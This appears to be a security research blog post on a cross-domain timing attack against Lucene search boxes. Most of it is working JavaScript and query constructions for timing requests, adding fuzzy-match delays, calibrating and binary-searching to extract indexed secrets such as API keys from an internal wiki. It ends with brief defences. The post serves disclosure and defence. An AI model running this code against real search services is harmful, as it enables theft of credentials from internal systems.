Exploiting CSRF against search with Lucene


Cross-domain timing attacks can be used against Lucene to reliably extract information contained within its index. By repeatedly timing HTTP requests with JavaScript, Lucene search boxes can be exploited in much the same way as time-based blind SQL injection.

While the same-origin policy prevents a script on one domain from reading the content of a resource on another, it does not stop the script from timing how long that resource takes to load or error. HTTP GET requests can be timed with the onerror event of an HTML img tag (other tags work as well). The time it takes the resource to error can be worked out by taking the difference between the time the request is started and the time the onerror event is called.

// Time how long a cross-domain search request takes to error out
var node = document.createElement("img");
node.onerror = function() { console.log(Date.now() - sTime); };
var out = document.getElementsByTagName("body")[0];
var sTime = Date.now();                              // start the clock...
node.src = "http://wiki.corp:8090/search?txt=fred";  // ...then fire the request
out.appendChild(node);

By observing the time taken to error, the attacker can attempt to work out whether the string "fred" is indexed. The premise is that if "fred" is present, the server will take a different amount of time to respond compared to a baseline response.

It would be good if it were that simple; if you try this you'll notice that there is basically no difference between a query for a term that is present and one that is not. High variance in network latency and server load can easily mask the results in noise. Looking at the graphs below (20 requests for an item that exists and 20 requests for an item that does not) you'll see that it is going to be pretty tricky to tell the two result sets apart.

Query exists vs Query does not exist graph

Reducing the effects of jitter

Network latency and server load vary over time; the more hops between where the JavaScript is running and the Lucene instance, the higher the variance in network delay. The way to reduce the noise is to issue a pair of requests at exactly the same time: one for an item you know does not exist (a random string) and one for the item whose presence you want to check. If the difference between the two timings is close to 0 you can assume that neither item exists; if they differ, you can assume the item exists.
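As a rough sketch of this paired measurement, building on the img timing above (the timePair helper and its structure are illustrative, not the original tool):

// Issue two search requests back-to-back and pass the timing difference
// (candidate minus control, in milliseconds) to the callback.
function timePair(candidateQuery, controlQuery, callback) {
  var base = "http://wiki.corp:8090/search?txt=";
  var results = {};
  function fire(label, query) {
    var img = document.createElement("img");
    var start;
    img.onerror = function() {
      results[label] = Date.now() - start;
      if ("candidate" in results && "control" in results) {
        callback(results.candidate - results.control);
      }
    };
    start = Date.now();
    img.src = base + encodeURIComponent(query);
    document.body.appendChild(img);
  }
  fire("control", controlQuery);      // term that almost certainly is not indexed
  fire("candidate", candidateQuery);  // term whose presence we want to test
}

// Usage: timePair("fred", "xq7randomxq7", function(delta) { console.log(delta); });

A difference that is repeatedly well above zero suggests the candidate term exists; a difference hovering around zero suggests it does not.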

You can see the effect of this quasi noise-cancellation in the graph below. When the requests are made concurrently, queries that exist generally take slightly longer to respond. Even when there is a spike in network latency at request 11, the gap between the two requests remains almost constant.

Concurrent request graph showing noise cancellation

Adding delay to Lucene

It's clear that Lucene is still responding too quickly to make this attack reliable. The gap between positive and negative matches is only a few milliseconds, and attempting to time this on anything but a LAN is going to be hard. Much like exploiting a blind SQL injection, we need to slow down requests when a result is found; this improves the tolerance to noise. Something similar to this, but in Lucene:

SELECT id, txt FROM customers WHERE txt LIKE "%fred%" AND SLEEP(10)

There are no sleep commands in the Lucene syntax, but we can exploit some of its features to generate a delay. The fuzzy match (denoted by a ~) is the slowest matching technique as it relies on computing the Levenshtein distance; if the distance is 2 or less, the string matches. This means we can write a pair of search terms like so:

(fred) AND (aaaaaaaaaaaaaaabb~ OR frde~...) // Query exists
(josh) AND (aaaaaaaaaaaaaaabb~ OR johs~...) // Query does not exist

This will match "fred" and then attempt the Levenshtein fuzzy matches. "frde" is only a distance of 2 away from "fred", so it will match. The more fuzzy matches you insert and the longer they are, the larger the difference between the two request types. The graph below shows the difference in concurrent response times when a 200-character fuzzy clause is appended; there is now a 40ms gap between request types. Note how the noise cancellation creates a buttery smooth difference line :)

Graph showing difference between queries after the addition of a Fuzzy query
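A small illustrative helper for building such padded queries (the padding length and the character-swap trick are assumptions of the sketch, not taken from the original tool):

// Build a query that matches `term` and, when it does, forces Lucene to work
// through a long fuzzy clause, adding a measurable delay.
function buildDelayQuery(term, padLength) {
  var pad = new Array(padLength + 1).join("a") + "bb~";                  // long fuzzy term that will not match
  var swapped = term.slice(0, -2) + term.slice(-1) + term.slice(-2, -1); // e.g. "fred" -> "frde", within edit distance 2
  return "(" + term + ") AND (" + pad + " OR " + swapped + "~)";
}

// buildDelayQuery("fred", 200) => "(fred) AND (aaa...abb~ OR frde~)"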

Auto calibration and data classification

You could easily look at the above graph and set one threshold for an item being present (> 40ms) and another (< 5ms) for an item not existing. However, relying on a pre-defined threshold for classification means the code won't work outside of your test environment; a set of statistical models must be built and tested automatically before you can commence data extraction.

The simplest way to do this is to keep adding fuzzy queries until the difference between true and false queries reaches a pre-determined value. Depending on the amount of data indexed you can easily cause a denial of service against Lucene, so it's wise to start out with a small fuzzy query and slowly increase its size until you achieve the desired delay, as in the sketch below. If there is no difference then either the string you are looking for doesn't exist or there is too much network noise.
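A possible calibration loop, reusing the illustrative timePair and buildDelayQuery helpers sketched earlier (the step size, upper bound and known word are arbitrary assumptions):

// Grow the fuzzy padding until the measured gap between a known-true and a
// known-false query exceeds the target delay, then report the padding length.
function calibrate(knownWord, targetDelayMs, callback, padLength) {
  padLength = padLength || 20;
  if (padLength > 400) { callback(null); return; }    // give up rather than risk a denial of service
  var randomWord = "zq" + Math.random().toString(36).slice(2, 8);
  timePair(buildDelayQuery(knownWord, padLength),
           buildDelayQuery(randomWord, padLength),
           function(delta) {
    if (delta >= targetDelayMs) {
      callback(padLength);                             // this padding gives a usable timing gap
    } else {
      calibrate(knownWord, targetDelayMs, callback, padLength + 20);
    }
  });
}

// calibrate("wiki", 40, function(len) { console.log("fuzzy padding:", len); });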

Assuming there is only one Lucene server, the distributions for both sets are roughly Gaussian but skewed slightly in opposite directions. Below are the distributions for 400 concurrent queries (red: false, blue: true).

Histogram showing distributions for True and False

Simple thresholding is by far the easiest method to use, although more complex classifiers work better if the sets overlap slightly. Even with noise cancellation it is possible for results to be misclassified, which is why it is essential to make several requests in order to classify accurately.
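One way this repeated sampling might look, again building on the earlier timePair sketch (simple majority voting here is a simplification of the 4-out-of-6 agreement rule used in the demo below):

// Take several sequential timing samples and decide by majority vote whether
// the candidate query is a hit.
function classify(candidateQuery, controlQuery, thresholdMs, samples, callback) {
  var votes = 0;
  (function next(remaining) {
    if (remaining === 0) { callback(votes > samples / 2); return; }  // majority vote
    timePair(candidateQuery, controlQuery, function(delta) {
      if (delta > thresholdMs) votes++;
      next(remaining - 1);
    });
  })(samples);
}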

Binary searching to extract data

You could try to guess words and phrases within the index, but it's probably more fruitful to target specific strings that may have been indexed by a particular application. For example, if Lucene is powering an internal wiki it would be wise to hunt for AWS secret keys or API keys used by specific services.

Up until now we have only been confirming the presence of a value within the index. In order to extract data we need to be able to search for data in a specific format. Luckily, Lucene lets us do that with range queries and regular expressions. The query below would match a 32-digit hex string (e.g. an API key):

(
 ([00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF])
 AND 
 (/[A-F0-9]{32}/)
 AND
 (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~)
)

For the false query we can just set the range to two random 32-character hex strings that differ by a few characters. The problem at this point is that we need to know another string in the document, otherwise our fuzzy match (which is a group of OR clauses) will return false. This can be overcome by simply guessing a word. A fuzzy search like IN~ will match IN, AN, ON, IM, ID, IT, TIN, IS, etc.; stick a few together and you will almost certainly match the document, as long as it contains a two-character word somewhere.
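A tiny helper for assembling that word-guess group (illustrative only):

// Build the fuzzy word-guess group used to anchor an extraction query when no
// term in the document is known: each short fuzzy guess matches many common words.
function wordGuessClause(guesses) {
  return "(" + guesses.map(function(g) { return g + "~"; }).join(" OR ") + ")";
}

// wordGuessClause(["IN", "AT", "TO"]) => "(IN~ OR AT~ OR TO~)"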

A binary search has to be modified slightly as we don't have less-than or greater-than operators. If the target is "50F86BE4F3F552673EFC68F3511875F6" the search requests will look like this (a sketch of driving the search follows the list):

[00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[00000000000000000000000000000000 TO 7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[00000000000000000000000000000000 TO 3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[40000000000000000000000000000000 TO 5FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[40000000000000000000000000000000 TO 4FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 57FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 53FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 51FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50000000000000000000000000000000 TO 507FFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50800000000000000000000000000000 TO 50BFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50C00000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50C00000000000000000000000000000 TO 50DFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50E00000000000000000000000000000 TO 50EFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F00000000000000000000000000000 TO 50FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F00000000000000000000000000000 TO 50F7FFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[50F80000000000000000000000000000 TO 50FBFFFFFFFFFFFFFFFFFFFFFFFFFFFF]
[...]
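A rough sketch of driving this range-halving from JavaScript, assuming a hypothetical testRange(lo, hi, cb) helper that wraps the classify sketch above and reports whether a key in the inclusive range exists (BigInt is used for the 128-bit arithmetic):

// Extract a 32-digit hex value by repeatedly halving an inclusive range.
// Without less-than / greater-than operators, each step asks whether the key
// falls in the lower half: if yes, keep it; if no, move to the upper half.
function extractHex(testRange, callback) {
  var lo = 0n;
  var hi = (1n << 128n) - 1n;                     // FFFF...F (32 hex digits)
  function toHex(v) { return v.toString(16).toUpperCase().padStart(32, "0"); }
  (function step() {
    if (lo === hi) { callback(toHex(lo)); return; }
    var mid = (lo + hi) / 2n;                     // BigInt division truncates
    testRange(toHex(lo), toHex(mid), function(inLowerHalf) {
      if (inLowerHalf) { hi = mid; } else { lo = mid + 1n; }
      step();
    });
  })();
}

Each iteration resolves one bit of the key, so a 32-digit hex string takes 128 range tests (plus whatever repeat requests the classifier needs).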

Preventing client and server caching

Sometimes results get cached either by the server or the client; we want to prevent this or it will interfere with our timing. The best way is to add an additional clause to our statements, in the form of a random string that almost certainly won't be present anywhere within the index, e.g. (a small token generator is sketched after the example):

(
 ([00000000000000000000000000000000 TO FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF])
 AND 
 (/[A-F0-9]{32}/)
 AND
 ((AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~ OR IN~) OR (QPDEK32L))
)
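A trivial helper for generating such a token (illustrative):

// Generate a random token that will not appear in the index; OR-ing it into a
// clause makes every query unique, so neither the browser nor the server can
// return a cached result.
function cacheBuster() {
  return Math.random().toString(36).slice(2, 10).toUpperCase();
}

// e.g. "... AND ((AAAA~ OR IN~) OR (" + cacheBuster() + "))"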

Demo

Here is a quick video of a 32-digit hex string being remotely extracted using Chrome 46 (timings are not as accurate in Firefox, which means increasing the delay further). Initially the demo calibrates itself to determine the optimal length of a fuzzy query. Once this has been identified it proceeds to do a binary search; the range of the current search is displayed in the top left. The code runs on an unstable network and requires that 4 out of the previous 6 concurrent timing results agree before it will continue to the next binary range. If you look carefully you can see it occasionally request additional data.

The data extraction rate is slow, roughly 12 HTTP requests for every bit of information. After the initial calibration it takes 80 seconds to extract 128 bits of text, which amounts to a data rate of roughly 1.6 bits per second.

I'll release the binary search code once my BeEF module is complete; in the meantime there is more than enough information here to write your own tool. This code is all you need to make concurrent requests.

Defending against this

The simplest and most robust solution is to add a CSRF token. If you don't want to do that, you could try filtering on the HTTP Accept header: it should read something along the lines of "Accept: image/webp,*/*;q=0.8" if the page is being loaded through an img tag. The other possibility is to restrict the user from performing Range, Regexp, Wildcard or Fuzzy searches, although even if you do this you could still be vulnerable.
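As a rough illustration of the Accept-header idea, a hypothetical server-side check (not from the original post) might look like this in Node.js:

// Flag search requests whose Accept header suggests they were triggered by an
// <img> tag rather than a normal page load or XHR.
function looksLikeImgLoad(req) {
  var accept = req.headers["accept"] || "";
  return /^image\//.test(accept);   // e.g. "image/webp,*/*;q=0.8"
}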

What next?

These attacks are not new; other search engines with complex query functionality are also likely vulnerable to timing attacks.